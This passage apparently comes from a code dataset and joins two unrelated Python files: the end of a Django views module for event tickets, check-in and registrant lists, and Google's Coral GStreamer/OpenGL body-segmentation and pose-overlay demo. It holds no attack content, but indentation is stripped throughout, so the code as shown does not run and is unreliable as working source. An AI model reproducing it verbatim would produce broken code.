drafts_count = len(Activity.objects.filter(is_delete=0, status=1, user_id=user_id).values())
publishing_activities_count = len(Activity.objects.filter(is_delete=0, status=2, user_id=user_id).values())
res['published_activities_count'] = published_activities_count
res['register_table_count'] = published_activities_count
res['drafts_count'] = drafts_count
res['publishing_activities_count'] = publishing_activities_count
if activity_level == 3:
published_activities_count = len(Activity.objects.filter(is_delete=0, status__gt=2).values())
drafts_count = len(Activity.objects.filter(is_delete=0, status=1, user_id=user_id).values())
publishing_activities_count = len(Activity.objects.filter(is_delete=0, status=2).values())
res['published_activities_count'] = published_activities_count
res['register_table_count'] = published_activities_count
res['drafts_count'] = drafts_count
res['publishing_activities_count'] = publishing_activities_count
return JsonResponse(res)
class TicketView(GenericAPIView, RetrieveModelMixin):
"""查看活动门票"""
queryset = Activity.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='查看活动门票')
def get(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
user_id = self.request.user.id
if not ActivityRegister.objects.filter(activity_id=activity_id, user_id=user_id):
return JsonResponse({'code': 404, 'msg': '用户还没有报名这个活动'})
res = {
'title': self.queryset.get(id=activity_id).title,
'poster': self.queryset.get(id=activity_id).poster,
'name': User.objects.get(id=user_id).name,
'telephone': User.objects.get(id=user_id).telephone
}
return JsonResponse(res)
class ActivitySignView(GenericAPIView, CreateModelMixin):
"""活动签到"""
serializer_class = ActivitySignSerializer
queryset = ActivitySign.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
def post(self, request, *args, **kwargs):
user_id = self.request.user.id
activity_id = self.request.data['activity']
if not ActivityRegister.objects.filter(activity_id=activity_id, user_id=user_id):
return JsonResponse({'code': 404, 'msg': '用户还没有报名这个活动'})
if not ActivitySign.objects.filter(activity_id=activity_id, user_id=user_id):
ActivitySign.objects.create(activity_id=activity_id, user_id=user_id)
return JsonResponse({'code': 201, 'msg': '活动签到'})
class ActivityRegistrantsView(GenericAPIView, RetrieveModelMixin):
"""活动报名者信息"""
serializer_class = ActivityRegistrantsSerializer
queryset = Activity.objects.filter(is_delete=0)
permission_classes = (QueryPermission,)
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
|
bodypix_gl_imx.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import collections
import io
import sys
import termios
import threading
import time
import queue
import numpy as np
from PIL import Image
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstBase', '1.0')
gi.require_version('GstGL', '1.0')
gi.require_version('GstVideo', '1.0')
gi.require_version('Gtk', '3.0')
from gi.repository import GLib, GObject, Gst, GstBase, GstGL, GstVideo, Gtk
from OpenGL.arrays.arraydatatype import ArrayDatatype
from OpenGL.GLES3 import (
glActiveTexture, glBindBuffer, glBindTexture, glBindVertexArray, glBlendEquation, glBlendFunc,
glBufferData, glClear, glClearColor, glDeleteBuffers, glDeleteTextures, glDeleteVertexArrays,
glDisable, glDrawElements, glEnable, glEnableVertexAttribArray, glGenBuffers, glGenTextures,
glGenVertexArrays, glPixelStorei, glTexImage2D, glTexParameteri, glTexSubImage2D,
glVertexAttribPointer)
from OpenGL.GLES3 import (
GL_ARRAY_BUFFER, GL_BLEND, GL_CLAMP_TO_EDGE, GL_COLOR_BUFFER_BIT, GL_ELEMENT_ARRAY_BUFFER,
GL_FALSE, GL_FLOAT, GL_FRAGMENT_SHADER, GL_FUNC_ADD, GL_LINEAR, GL_NEAREST,
GL_ONE_MINUS_SRC_ALPHA, GL_R16F, GL_R32F, GL_RED, GL_RGB, GL_RGBA16F, GL_RGBA, GL_SRC_ALPHA, GL_STATIC_DRAW, GL_TEXTURE0,
GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_TEXTURE_MIN_FILTER, GL_TEXTURE_WRAP_S, GL_TEXTURE_WRAP_T,
GL_TRIANGLES, GL_UNPACK_ALIGNMENT, GL_UNSIGNED_BYTE, GL_UNSIGNED_SHORT, GL_VERTEX_SHADER)
import ctypes
from ctypes import pythonapi
from ctypes.util import find_library
from pose_engine import PoseEngine, EDGES, BODYPIX_PARTS
# Color mapping for bodyparts
RED_BODYPARTS = [k for k,v in BODYPIX_PARTS.items() if "right" in v]
GREEN_BODYPARTS = [k for k,v in BODYPIX_PARTS.items() if "hand" in v or "torso" in v]
BLUE_BODYPARTS = [k for k,v in BODYPIX_PARTS.items() if "leg" in v or "arm" in v or "face" in v or "hand" in v]
Gst.init(None)
# ctypes imports for missing or broken introspection APIs.
libgstgl = ctypes.CDLL(find_library('gstgl-1.0'))
libgstgl.gst_gl_memory_get_texture_id.argtypes = [ctypes.c_void_p]
libgstgl.gst_gl_memory_get_texture_id.restype = ctypes.c_uint
GstGLFramebufferFunc = ctypes.CFUNCTYPE(ctypes.c_bool, ctypes.py_object)
libgstgl.gst_gl_framebuffer_draw_to_texture.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
GstGLFramebufferFunc, ctypes.py_object]
libgstgl.gst_gl_framebuffer_draw_to_texture.restype = ctypes.c_bool
libgstgl.gst_is_gl_memory_egl.argtypes = [ctypes.c_void_p]
libgstgl.gst_is_gl_memory_egl.restype = ctypes.c_bool
def get_gl_texture_id(buf):
memory = buf.peek_memory(0)
assert GstGL.is_gl_memory(memory)
return libgstgl.gst_gl_memory_get_texture_id(hash(memory))
def is_egl_image(buf):
memory = buf.peek_memory(0)
assert GstGL.is_gl_memory(memory)
return libgstgl.gst_is_gl_memory_egl(hash(memory))
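# Note: hash() on a GstMemory from PyGObject is used above as a way to obtain the
# address of the underlying C object, so it can be passed to the ctypes-wrapped
# GStreamer GL functions whose introspection bindings are missing or broken.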
POSITIONS = np.array([
-1.0, -1.0,
1.0, -1.0,
1.0, 1.0,
-1.0, 1.0,
], dtype=np.float32)
TEXCOORDS = np.array([
0.0, 0.0,
1.0, 0.0,
1.0, 1.0,
0.0, 1.0,
], dtype=np.float32)
INDICES = np.array([
0, 1, 2, 0, 2, 3
], dtype=np.uint16)
FRAGMENT_SHADER_SRC = '''
precision mediump float;
varying vec2 v_texcoord;
uniform sampler2D image_tex, hm_tex, bg_tex;
uniform int stage;
uniform float ratio;
uniform float heatmap_mul;
// Clamps heatmap between [v0, v1] and rescales to [0,1]
float sample_heatmap(float v0, float v1)
{
float value = texture2D(hm_tex, v_texcoord).a;
float a = v0 / (v0 - v1);
float b = 1.0 / (v1 - v0);
return clamp(a + b * value, 0.0, 1.0);
}
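// sample_heatmap(v0, v1) above is a linear remap of the raw heatmap value:
// it returns clamp((value - v0) / (v1 - v0), 0.0, 1.0), i.e. v0 maps to 0.0
// and v1 maps to 1.0.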
vec4 stage0_background()
{
float heatmap = sample_heatmap(-2.3, -0.6);
vec4 bg = texture2D(bg_tex, v_texcoord);
vec4 image = texture2D(image_tex, v_texcoord);
vec4 estimate = (bg * heatmap + image * (1.0 - heatmap));
vec4 new_bg = bg * (1.0 - ratio) + ratio * estimate;
return new_bg;
}
vec4 stage1_anon_background()
{
return texture2D(bg_tex, v_texcoord);
}
vec4 stage2_overlays()
{
float heatmap = sample_heatmap(-1.0, 1.0)*heatmap_mul;
vec4 body_outline = vec4(texture2D(hm_tex, v_texcoord).xyz, 0.7*heatmap);
return body_outline;
}
void main()
{
if (stage == 0) {
gl_FragColor = stage0_background();
} else if (stage == 1) {
gl_FragColor = stage1_anon_background();
} else if (stage == 2) {
gl_FragColor = stage2_overlays();
} else {
gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);
}
}
'''
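# The fragment shader above is used in three passes selected by the 'stage'
# uniform: stage 0 folds the current frame into the running background estimate
# (regions covered by a person keep the old background, the rest takes the new
# frame, blended in with 'ratio'); stage 1 simply draws the anonymized
# background; stage 2 draws the translucent body-part overlay from the heatmap.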
KEYPOINT_SCORE_THRESHOLD = 0.2
SVG_HEADER = '<svg width="{w}" height="{h}" version="1.1" >'
SVG_STYLES = '''
<style>
.counter {{ font-size: {counter_size}px; font-family: sans-serif; }}
.text_bg {{ fill: black; }}
.text_fg {{ fill: white; }}
.bbox {{ stroke: white; stroke-width: 2; fill: none;}}
.kpcirc {{ fill: cyan; stroke: blue; }}
.kpline {{ stroke: blue; stroke-width: 2; }}
.whiteline {{ stroke: white; stroke-width: 2; }}
</style>
'''
SVG_BB_RECT = ' <rect x="{x}" y="{y}" width="{w}" height="{h}" class="bbox" />'
SVG_KP_CIRC = ' <circle cx="{cx}" cy="{cy}" r="5" class="kpcirc" />'
SVG_KP_LINE = ' <line x1="{x1}" y1="{y1}" x2="{x2}" y2="{y2}" class="kpline" />'
SVG_WHITE_LINE = ' <line x1="{x1}" y1="{y1}" x2="{x2}" y2="{y2}" class="whiteline" />'
SVG_TEXT = '''
<text x="{x}" y="{y}" dx="0.05em" dy="0.05em" class="{clazz} text_bg">{text}</text>
<text x="{x}" y="{y}" class="{clazz} text_fg">{text}</text>
'''
SVG_FOOTER = '</svg>'
TOGGLE_SKELETONS = 's'
TOGGLE_BBOXES = 'b'
TOGGLE_ANON = 'a'
TOGGLE_HEATMAP = 'h'
TOGGLE_BODYPARTS = 'p'
TOGGLE_RESET = 'r'
class Callback:
def __init__(self, engine, src_size, save_every_n_frames=-1, print_stats=False):
self.engine = engine
self.src_size = src_size
self.save_every_n_frames = save_every_n_frames
self.print_stats = print_stats
self.inf_q = queue.SimpleQueue()
self.trash = queue.SimpleQueue()
self.trash_lock = threading.RLock()
self.vinfo = GstVideo.VideoInfo()
self.glcontext = None
self.pool = None
self.fbo = None
self.default_shader = None
self.hm_shader = None
self.hm_tex_id = 0 # Instantaneous heatmap
self.vao_id = 0
self.positions_buffer = 0
self.texcoords_buffer = 0
self.vbo_indices_buffer = 0
self.frames = 0
self.reset_display_toggles()
self.inf_times = collections.deque(maxlen=100)
self.agg_times = collections.deque(maxlen=100)
self.frame_times = collections.deque(maxlen=100)
self.running = True
self.gc_thread = threading.Thread(target=self.gc_loop)
self.gc_thread.start()
self.last_frame_time = time.monotonic()
def reset_display_toggles(self):
self.skeletons = True
self.bboxes = True
self.anon = False
self.hm = True
self.bodyparts = True
def gc_loop(self):
while self.running:
try:
buf = self.trash.get(timeout=0.1)
self.trash.put(buf)
buf = None
self.empty_trash()
except queue.Empty:
pass
# gl thread
def empty_trash_gl(self, glcontext):
while True:
try:
buf = self.trash.get(block=False)
# Anyone trashing buffers must hold trash_lock to ensure
# the last ref is dropped in this thread!
with self.trash_lock:
buf = None
except queue.Empty:
break
def empty_trash(self):
self.glcontext.thread_add(self.empty_trash_gl)
# Caller must hold trash_lock until its final ref to bufs is dropped.
def trash_buffer(self, buf):
self.trash.put(buf)
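    # Buffer disposal pattern: GL-backed GstBuffers queued via trash_buffer() are
    # drained by gc_loop() on a worker thread, which marshals the actual release
    # onto the GL thread (empty_trash_gl) so that the final unref happens while
    # the GL context is current.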
# gl thread
def init_gl(self, glcontext):
#TODO deinit at some point
assert not self.glcontext
vert_stage = GstGL.GLSLStage.new_default_vertex(glcontext)
frag_stage = GstGL.GLSLStage.new_with_string(glcontext,
GL_FRAGMENT_SHADER,
GstGL.GLSLVersion.NONE,
GstGL.GLSLProfile.COMPATIBILITY | GstGL.GLSLProfile.ES,
FRAGMENT_SHADER_SRC)
self.hm_shader = GstGL.GLShader.new(glcontext)
self.hm_shader.compile_attach_stage(vert_stage)
self.hm_shader.compile_attach_stage(frag_stage)
self.hm_shader.link()
self.default_shader = GstGL.GLShader.new_default(glcontext)
a_position = self.default_shader.get_attribute_location('a_position')
a_texcoord = self.default_shader.get_attribute_location('a_texcoord')
self.vao_id = glGenVertexArrays(1)
glBindVertexArray(self.vao_id)
self.positions_buffer = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.positions_buffer)
glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(POSITIONS), POSITIONS, GL_STATIC_DRAW)
self.texcoords_buffer = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.texcoords_buffer)
glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(TEXCOORDS), TEXCOORDS, GL_STATIC_DRAW)
self.vbo_indices_buffer = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.vbo_indices_buffer)
glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(INDICES), INDICES, GL_STATIC_DRAW)
        glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vbo_indices_buffer)
        glBindBuffer(GL_ARRAY_BUFFER, self.positions_buffer)
        glVertexAttribPointer.baseFunction(a_position, 2, GL_FLOAT, GL_FALSE, 0, None)
        glBindBuffer(GL_ARRAY_BUFFER, self.texcoords_buffer)
        glVertexAttribPointer.baseFunction(a_texcoord, 2, GL_FLOAT, GL_FALSE, 0, None)
glEnableVertexAttribArray(a_position)
glEnableVertexAttribArray(a_texcoord)
glBindVertexArray(0)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)
glBindBuffer(GL_ARRAY_BUFFER, 0)
hm_w, hm_h = self.get_heatmap_texture_size()
texture_ids = glGenTextures(1)
self.hm_tex_id = texture_ids
glActiveTexture(GL_TEXTURE0 + 1)
glBindTexture(GL_TEXTURE_2D, self.hm_tex_id)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)
glPixelStorei(GL_UNPACK_ALIGNMENT, 1)
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA16F, hm_w, hm_h, 0, GL_RGBA, GL_FLOAT, None)
self.glcontext = glcontext
# gl thread
def init_fbo(self, glcontext, width, height):
#TODO deinit at some point
self.fbo = GstGL.GLFramebuffer.new_with_default_depth(self.glcontext, width, height)
# gl thread
def render_single_texture(self, tex):
glBindVertexArray(self.vao_id)
glActiveTexture(GL_TEXTURE0)
glBindTexture(GL_TEXTURE_2D, get_gl_texture_id(tex))
self.default_shader.use()
self.default_shader.set_uniform_1i('image_tex', 0)
glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_SHORT, None)
return True
# gl thread
def update_heatmap(self, glcontext, heatmap):
glActiveTexture(GL_TEXTURE0 + 1)
glBindTexture(GL_TEXTURE_2D, self.hm_tex_id)
glPixelStorei(GL_UNPACK_ALIGNMENT, 1)
glTexSubImage2D(GL_TEXTURE_2D, 0, 0, 0,
heatmap.shape[1], heatmap.shape[0],
GL_RGBA, GL_FLOAT, heatmap)
    # Since the aspect ratio of the input image is not necessarily the
    # same as that of the inference input, and we rescale while maintaining
    # aspect ratio, we need to trim the heatmap to match the image
    # aspect ratio.
def get_heatmap_texture_size(self):
src_ratio = self.src_size[0]/self.src_size[1]
inf_ratio = self.engine.image_width/self.engine.image_height
result = [
int(self.engine.heatmap_size[0]*min(1.0, src_ratio/inf_ratio)),
int(self.engine.heatmap_size[1]*min(1.0, inf_ratio/src_ratio)),
]
return result
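    # Worked example (illustrative values, not from a real run): with a
    # 1280x720 source (ratio ~1.78) and a 4:3 inference input (ratio ~1.33),
    # src_ratio/inf_ratio > 1 so the heatmap width is kept in full, while the
    # height is scaled by inf_ratio/src_ratio = 0.75, i.e. the heatmap is
    # cropped vertically to match the wider camera image.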
# gl thread
def setup_scene(self, image_tex, bind_hm=True, bind_bg=True):
glBindVertexArray(self.vao_id)
glActiveTexture(GL_TEXTURE0)
glBindTexture(GL_TEXTURE_2D, image_tex)
glActiveTexture(GL_TEXTURE0 + 1)
glBindTexture(GL_TEXTURE_2D, self.hm_tex_id if bind_hm else 0)
glActiveTexture(GL_TEXTURE0 + 2)
glBindTexture(GL_TEXTURE_2D, get_gl_texture_id(self.bg_buf) if bind_bg else 0)
self.hm_shader.use()
self.hm_shader.set_uniform_1i('image_tex', 0)
self.hm_shader.set_uniform_1i('hm_tex', 1)
self.hm_shader.set_uniform_1i('bg_tex', 2)
# gl thread
def render_background(self, args):
vid_buf, new_bg_buf = args
# This is the mixing ratio of the instantaneous background estimate and
# the current aggregated background estimate.
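        # The ratio follows roughly 2/frames (clamped to [0.001, 1.0]), so early
        # frames update the background quickly while later frames blend in only
        # a small fraction, approximating a running average of the scene.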
ratio = max(0.001, 1.0 / max(1.0, self.frames / 2.0))
self.setup_scene(get_gl_texture_id(vid_buf))
self.hm_shader.set_uniform_1i('stage', 0)
self.hm_shader.set_uniform_1f('ratio', ratio)
glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_SHORT, None)
# Drop the ref to old background here in the GL thread.
self.bg_buf = new_bg_buf
return True
# gl thread
def render_anon_background(self, arg):
self.setup_scene(0, bind_hm=False)
self.hm_shader.set_uniform_1i('stage', 1)
glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_SHORT, None)
return True
# gl thread
def render_overlays(self, arg):
self.setup_scene(0, bind_bg=False, bind_hm=True)
self.hm_shader.set_uniform_1i('stage', 2)
self.hm_shader.set_uniform_1f('heatmap_mul', 1.0 if self.hm else 0.0)
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glBlendEquation(GL_FUNC_ADD)
glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_SHORT, None)
glDisable(GL_BLEND)
return True
# gl thread
def render_to_texture_gl(self, glcontext, dst, render_func, render_arg):
libgstgl.gst_gl_framebuffer_draw_to_texture(
hash(self.fbo),
hash(dst.peek_memory(0)),
GstGLFramebufferFunc(render_func),
render_arg)
meta = GstGL.buffer_add_gl_sync_meta(glcontext, dst)
meta.set_sync_point(glcontext)
def render_to_texture(self, dst, render_func, render_arg):
self.glcontext.thread_add(self.render_to_texture_gl, dst, render_func, render_arg)
def ensure_buffers_setup(self, vid_caps):
assert self.glcontext
if self.pool:
return
self.vinfo.from_caps(vid_caps)
self.glcontext.thread_add(self.init_fbo, self.vinfo.width, self.vinfo.height)
self.pool = GstGL.GLBufferPool.new(self.glcontext)
config = self.pool.get_config()
Gst.BufferPool.config_set_params(config, vid_caps, self.vinfo.size, 0, 0)
Gst.BufferPool.config_add_option(config, GstVideo.BUFFER_POOL_OPTION_VIDEO_META)
self.pool.set_config(config)
#TODO set inactive at some point
self.pool.set_active(True)
self.bg_buf = self.acquire_pooled_buffer()
def clear_texture(args):
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.render_to_texture(self.bg_buf, clear_texture, None)
def acquire_pooled_buffer(self):
assert self.pool
res, buf = self.pool.acquire_buffer()
assert res == Gst.FlowReturn.OK
return buf
def get_output_buffer(self, vid_caps, pts=Gst.CLOCK_TIME_NONE):
self.ensure_buffers_setup(vid_caps)
buf = self.acquire_pooled_buffer()
buf.pts = pts
return buf
def generate_svg(self, poses, inference_box, text):
box_x, box_y, box_w, box_h = inference_box
scale_x, scale_y = self.vinfo.width / box_w, self.vinfo.height / box_h
svg = io.StringIO()
svg.write(SVG_HEADER.format(w=self.vinfo.width , h=self.vinfo.height))
svg.write(SVG_STYLES.format(counter_size=int(3 * self.vinfo.height / 100)))
pose_count = 0
# Iterate over poses and keypoints just once.
for pose in poses:
xys = {}
bbox = [sys.maxsize, sys.maxsize, 0, 0]
good_poses = 0
for label, keypoint in pose.keypoints.items():
if keypoint.score < KEYPOINT_SCORE_THRESHOLD:
continue
good_poses += 1
# Offset and scale to source coordinate space.
kp_y = int((keypoint.yx[0] - box_y) * scale_y)
kp_x = int((keypoint.yx[1] - box_x) * scale_x)
bbox[0] = int(min(bbox[0], kp_y))
bbox[1] = int(min(bbox[1], kp_x))
bbox[2] = int(max(bbox[2], kp_y))
bbox[3] = int(max(bbox[3], kp_x))
xys[label] = (kp_x, kp_y)
# Keypoint.
if self.skeletons:
svg.write(SVG_KP_CIRC.format(cx=kp_x, cy=kp_y))
y1, x1, y2, x2 = bbox[0], bbox[1], bbox[2], bbox[3]
x, y, w, h = x1, y1, x2 - x1, y2 - y1
# Bounding box.
if good_poses:
if self.bboxes:
svg.write(SVG_BB_RECT.format(x=x, y=y, w=w, h=h))
pose_count += 1
for a, b in EDGES:
if a not in xys or b not in xys:
continue
ax, ay = xys[a]
bx, by = xys[b]
# Skeleton.
if self.skeletons:
svg.write(SVG_KP_LINE.format(x1=ax, y1=ay, x2=bx, y2=by))
svg.write(SVG_TEXT.format(x=0, y='1em', clazz='counter', text=text))
svg.write(SVG_FOOTER)
return svg.getvalue()
    # run_inference and aggregate_buffers run in separate threads
# to allow parallelization between TPU and CPU processing.
def run_inference(self, inf_buf, inf_caps):
start = time.monotonic()
inference_time, data = self.engine.run_inference(inf_buf)
# Underlying output tensor is owned by engine and if we want to
# keep the data around while running another inference we have
# to make our own copy.
self.inf_q.put(data.copy())
if self.save_every_n_frames > 0 and self.frames % self.save_every_n_frames == 0:
meta = GstVideo.buffer_get_video_meta(inf_buf)
result, mapinfo = inf_buf.map(Gst.MapFlags.READ)
image = Image.frombytes('RGB', (meta.width, meta.height), mapinfo.data)
image.save('inf_{:05d}.png'.format(self.frames))
inf_buf.unmap(mapinfo)
elapsed = time.monotonic() - start
self.inf_times.append(elapsed)
# Called on GStreamer streaming thread. Returns
# (svg, out_buf) tuple. Caller guarantees out_buf is freed on
# the gl thread or there's risk of deadlock.
def aggregate_buffers(self, inf_buf, inf_caps, vid_buf, vid_caps, box):
self.frames += 1
start = time.monotonic()
data = self.inf_q.get()
poses, heatmap, bodyparts = self.engine.ParseOutputs(data)
# Clip heatmaps according to aspect ratio difference between camera
# and inference input size
hm_crop_size = self.get_heatmap_texture_size()
hbox_topleft = [
(self.engine.heatmap_size[1]-hm_crop_size[1])//2,
(self.engine.heatmap_size[0]-hm_crop_size[0])//2,
]
heatmap = heatmap[
hbox_topleft[0]:hbox_topleft[0]+hm_crop_size[1],
hbox_topleft[1]:hbox_topleft[1]+hm_crop_size[0]
]
bodyparts = bodyparts[
hbox_topleft[0]:hbox_topleft[0]+hm_crop_size[1],
hbox_topleft[1]:hbox_topleft[1]+hm_crop_size[0]
]
if self.bodyparts:
# Turn bodyparts into different hues, overall heatmap
# acts as opacity mask (alpha channel)
rgba_heatmap = np.dstack([
(np.sum(bodyparts[:,:,RED_BODYPARTS], axis=2)-0.5)*100,
(np.sum(bodyparts[:,:,GREEN_BODYPARTS], axis=2)-0.5)*100,
(np.sum(bodyparts[:,:,BLUE_BODYPARTS], axis=2)-0.5)*100,
heatmap,
])
else:
rgba_heatmap = np.dstack([
np.ones_like(heatmap),
np.zeros_like(heatmap),
np.zeros_like(heatmap),
heatmap])
# Upload heatmap
self.glcontext.thread_add(self.update_heatmap, rgba_heatmap)
# Render new background.
new_bg_buf = self.get_output_buffer(vid_caps)
self.render_to_texture(new_bg_buf, self.render_background, (vid_buf, new_bg_buf))
# Render output image.
if self.anon:
out_buf = self.get_output_buffer(vid_caps, vid_buf.pts)
self.render_to_texture(out_buf, self.render_anon_background, None)
else:
# NXP has an optimization where camera frames in dmabufs are wrapped
# as EGLImages to be used as textures without copies or extra draws.
# This works as source for drawing, but they can't be drawn to. So
# if we get an EGLImage here we need to allocate our own output buffer
# so that we can draw to it. When glvideoflip flips the video this is
# already done there, in which case we can draw straight to vid_buf.
if is_egl_image(vid_buf):
out_buf = self.get_output_buffer(vid_caps, vid_buf.pts)
self.render_to_texture(out_buf, self.render_single_texture, vid_buf)
else:
out_buf = vid_buf
self.render_to_texture(out_buf, self.render_overlays, None)
# Useful for debugging. Simply call this with any GL buffer as the last
# parameter to draw that texture to the first parameter (e.g. out_buf).
# self.render_to_texture(out_buf, self.render_single_texture, self.bg_buf)
now_time = time.monotonic()
self.agg_times.append(now_time - start)
self.frame_times.append(now_time - self.last_frame_time)
self.last_frame_time = now_time
inf_time = 1000 * sum(self.inf_times) / len(self.inf_times)
frame_time = 1000 * sum(self.frame_times) / len(self.frame_times)
with self.trash_lock:
self.trash_buffer(vid_buf)
vid_buf = None
text = 'Inference: {:.2f} ms Total frame time: {:.2f} ms ({:.2f} FPS) Current occupancy: {:d}'.format(
inf_time, frame_time, 1000 / frame_time, len(poses))
if self.print_stats and (self.frames % 100) == 0: print(text)
# Generate SVG overlay.
svg = self.generate_svg(poses, box, text)
return svg, out_buf
def handle_stdin_char(self, char):
if char == TOGGLE_SKELETONS:
self.skeletons = not self.skeletons
elif char == TOGGLE_BBOXES:
self.bboxes = not self.bboxes
elif char == TOGGLE_ANON:
self.anon = not self.anon
elif char == TOGGLE_HEATMAP:
self.hm = not self.hm
elif char == TOGGLE_BODYPARTS:
if not self.hm and self.bodyparts:
self.hm = not self.hm
else:
self.bodyparts = not self.bodyparts
self.hm = self.hm or self.bodyparts
elif char == TOGGLE_RESET:
self.frames = 1
class GstPipeline:
def __init__(self, pipeline, callback):
self.callback = callback
self.pipeline = Gst.parse_launch(pipeline)
self.overlaysink = self.pipeline.get_by_name('overlaysink')
        # We have high latency at higher resolutions, so don't drop late frames.
# TODO: Maybe make this dynamic?
sinkelement = self.overlaysink.get_by_interface(GstVideo.VideoOverlay)
sinkelement.set_property('sync', False)
sinkelement.set_property('qos', False)
inference = self.pipeline.get_by_name('inf')
inference.callback = callback.run_inference
aggregator = self.pipeline.get_by_name('agg')
aggregator.buffers_aggregated_callback = self.on_buffers_aggregated
aggregator.trash_lock = self.callback.trash_lock
aggregator.trash_buffer_callback = self.callback.trash_buffer
# Set up a pipeline bus watch to catch errors.
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_bus_message)
self.box = None
self.setup_window()
def run(self):
# Set to READY and wait, get OpenGL context.
self.pipeline.set_state(Gst.State.READY)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
assert self.overlaysink.glcontext
self.overlaysink.glcontext.thread_add(self.callback.init_gl)
if sys.stdin.isatty():
fd = sys.stdin.fileno()
old_mode = termios.tcgetattr(fd)
new_mode = termios.tcgetattr(fd)
new_mode[3] = new_mode[3] & ~(termios.ICANON | termios.ECHO)
termios.tcsetattr(fd, termios.TCSANOW, new_mode)
GLib.io_add_watch(sys.stdin, GLib.IO_IN, self.on_stdin)
try:
# Run pipeline.
self.pipeline.set_state(Gst.State.PLAYING)
Gtk.main()
except:
pass
finally:
if sys.stdin.isatty():
termios.tcsetattr(fd, termios.TCSAFLUSH, old_mode)
# Clean up.
self.pipeline.set_state(Gst.State.READY)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
self.callback.empty_trash()
self.callback.running = False
self.pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
def on_bus_message(self, bus, message):
t = message.type
if t == Gst.MessageType.EOS:
# Try to seek back to the beginning. If pipeline
# isn't seekable we shouldn't get here in the first
# place so if seek fails just quit.
if not self.pipeline.seek_simple(Gst.Format.TIME,
Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT,
0):
Gtk.main_quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
Gtk.main_quit()
return True
def on_buffers_aggregated(self, inf_buf, inf_caps, vid_buf, vid_caps):
svg, out_buf = self.callback.aggregate_buffers(inf_buf, inf_caps,
vid_buf, vid_caps, self.get_box())
if svg:
self.overlaysink.set_property('svg', svg)
return out_buf
# Returns a cached representation of the inference scaling box.
def get_box(self):
if not self.box:
glbox = self.pipeline.get_by_name('glbox')
assert glbox
glbox = glbox.get_by_name('filter')
self.box = (glbox.get_property('x'), glbox.get_property('y'),
glbox.get_property('width'), glbox.get_property('height'))
return self.box
# stdin is ready for reading
def on_stdin(self, file, cond):
char = file.read(1)
if len(char) == 1:
self.callback.handle_stdin_char(char)
return True
return False
def setup_window(self):
# Only set up our own window if we have Coral overlay sink in the pipeline.
if not self.overlaysink:
return
gi.require_version('GstGL', '1.0')
gi.require_version('GstVideo', '1.0')
from gi.repository import GstGL, GstVideo
# Needed to commit the wayland sub-surface.
def on_gl_draw(sink, widget):
widget.queue_draw()
# Needed to account for window chrome etc.
def on_widget_configure(widget, event, overlaysink):
allocation = widget.get_allocation()
overlaysink.set_render_rectangle(allocation.x, allocation.y,
allocation.width, allocation.height)
return False
window = Gtk.Window()
window.fullscreen()
drawing_area = Gtk.DrawingArea()
window.add(drawing_area)
drawing_area.realize()
self.overlaysink.connect('drawn', on_gl_draw, drawing_area)
# Wayland window handle.
wl_handle = self.overlaysink.get_wayland_window_handle(drawing_area)
self.overlaysink.set_window_handle(wl_handle)
# Wayland display context wrapped as a GStreamer context.
wl_display = self.overlaysink.get_default_wayland_display_context()
self.overlaysink.set_context(wl_display)
drawing_area.connect('configure-event', on_widget_configure, self.overlaysink)
window.connect('delete-event', Gtk.main_quit)
window.show_all()
# The appsink pipeline branch must use the same GL display as the screen
# rendering so they get the same GL context. This isn't automatically handled
# by GStreamer as we're the ones setting an external display handle.
def on_bus_message_sync(bus, message, overlaysink):
if message.type == Gst.MessageType.NEED_CONTEXT:
_, context_type = message.parse_context_type()
